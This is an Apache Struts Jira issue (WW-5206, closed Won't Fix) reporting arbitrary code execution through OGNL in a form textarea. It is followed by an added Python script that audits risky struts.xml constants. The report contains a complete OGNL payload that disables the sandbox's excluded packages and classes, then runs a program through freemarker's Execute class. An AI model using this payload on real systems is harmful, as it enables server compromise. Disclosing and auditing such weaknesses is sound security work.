Posted to issues@struts.apache.org by "Lukasz Lenart (Jira)" <ji...@apache.org> on 2022/07/27 18:55:00 UTC

[jira] [Closed] (WW-5206) OGNL execute arbitrary code

     [ https://issues.apache.org/jira/browse/WW-5206?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Lukasz Lenart closed WW-5206.
-----------------------------
    Resolution: Won't Fix

> OGNL execute arbitrary code
> ---------------------------
>
>                 Key: WW-5206
>                 URL: https://issues.apache.org/jira/browse/WW-5206
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core
>    Affects Versions: 2.5.30
>            Reporter: Benjamin Lepeigneul
>            Priority: Trivial
>
> Hi,
>  
> I can run arbitrary code with version 2.5.30 of Struts 2.
>  
> JSP code:
> <s:textarea
> label="%{getText('information.message.erreur')}"
> id="messageErreurTexte"
> name="formInformation.message"
> cssClass="input-messageErreur"
> value="${pageInformation.message}"
> />
>  
> If I write this text in my form input textarea:
> %\{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
> (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
> (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
> (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
> (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc.exe'}))}
> Whenever the page is displayed, the binary calc.exe is executed.
>  
> My generic Struts params:
>  * struts.ognl.allowStaticMethodAccess = true
>  * struts.ognl.expressionMaxLength not set
>  * struts.devMode = false
>  * struts.ui.theme = simple
>  
> Is it normal?
>  
> Thanks.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
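
The report lists the Struts constants in effect on the affected application. As an added example (not part of the Jira message and not Struts project code), the audit below reads the constants from a struts.xml document and flags static method access being enabled, the expression length limit being unset, and devMode being on. The sample XML and the limit value 200 are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample mirroring the constants listed in the report
# (struts.ognl.expressionMaxLength is deliberately absent, i.e. "not set").
SAMPLE_STRUTS_XML = """<!DOCTYPE struts PUBLIC
  "-//Apache Software Foundation//DTD Struts Configuration 2.5//EN"
  "http://struts.apache.org/dtds/struts-2.5.dtd">
<struts>
  <constant name="struts.ognl.allowStaticMethodAccess" value="true"/>
  <constant name="struts.devMode" value="false"/>
  <constant name="struts.ui.theme" value="simple"/>
</struts>"""


def read_constants(struts_xml):
    """Return {name: value} for every <constant> element in a struts.xml document."""
    root = ET.fromstring(struts_xml)  # the DTD is not fetched by ElementTree
    return {c.get("name"): (c.get("value") or "").strip()
            for c in root.iter("constant")}


def audit(constants):
    """Return (constant, finding) pairs for OGNL-related settings worth fixing."""
    findings = []
    if constants.get("struts.ognl.allowStaticMethodAccess", "false").lower() == "true":
        findings.append(("struts.ognl.allowStaticMethodAccess",
                         "static method calls are enabled in OGNL; set to false"))
    limit = constants.get("struts.ognl.expressionMaxLength")
    if limit is None:
        findings.append(("struts.ognl.expressionMaxLength",
                         "not set; OGNL expressions of any length are evaluated"))
    elif not limit.isdigit() or int(limit) <= 0:
        findings.append(("struts.ognl.expressionMaxLength",
                         "value %r is not a positive integer" % limit))
    if constants.get("struts.devMode", "false").lower() == "true":
        findings.append(("struts.devMode",
                         "development mode is on; set to false in production"))
    return findings


if __name__ == "__main__":
    for name, finding in audit(read_constants(SAMPLE_STRUTS_XML)):
        print(name + ": " + finding)
```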